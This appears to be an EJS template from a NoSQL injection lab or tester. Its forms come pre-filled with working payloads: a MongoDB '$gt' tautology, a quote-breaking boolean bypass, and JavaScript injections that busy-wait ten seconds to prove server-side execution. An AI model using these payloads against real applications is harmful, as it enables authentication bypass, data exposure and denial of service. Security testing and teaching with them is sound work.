      
        <form method="POST" action="/attack-vector-tester/verb-attack">
            <label>Tautologies Attack: </label><input value='{ "$gt": "" }' name="payload" type="text" /></label>
            <% if(query) { %>
                <%=query %> 
                <% } %>
            <input type="submit" value="Submit" />
        </form>
        <form method="POST" action="/attack-vector-tester/js-injection-one">
            <label>Union Attack: </label><input value="' || 'a'=='a" name="payload" type="text" /></label>
            <% if(query) { %>
                <%=query %> 
                <% } %>
            <input type="hidden" name="quoteType" value="0"  />
            <input type="submit" value="Submit" />  
            <% if(success){ %>
                <strong style='color:green;'>Success</strong>
            <% } else { %>
                <strong style='color:red;'>Failure</strong>
            <% } %>
        </form>
        <form method="POST" action="/attack-vector-tester/js-injection-one">
            <label>JS Injection Attack (using '): </label><input value="' || (function(){ var date=new Date(); do{curDate = new Date();}while(curDate-date<10000);})() || '" name="payload" type="text" /></label>
            <% if(query) { %>
                <%=query %> 
                <% } %>
            <input type="hidden" name="quoteType" value="0"  />
            <input type="submit" value="Submit" />  
            <% if(success){ %>
                <strong style='color:green;'>Success</strong>
            <% } else { %>
                <strong style='color:red;'>Failure</strong>
            <% } %>
        </form>
        <form method="POST" action="/attack-vector-tester/js-injection-one">
            <label>JS Injection Attack (using "): </label><input value='" || (function(){ var date=new Date(); do{curDate = new Date();}while(curDate-date<10000);})() || "' name="payload" type="text" /></label>
            <% if(query) { %>
                <%=query %> 
                <% } %>
            <input type="hidden" name="quoteType" value="1"  />
            <input type="submit" value="Submit" />  
            <% if(success){ %>
                <strong style='color:green;'>Success</strong>
            <% } else { %>
                <strong style='color:red;'>Failure</strong>
            <% } %>
        </form>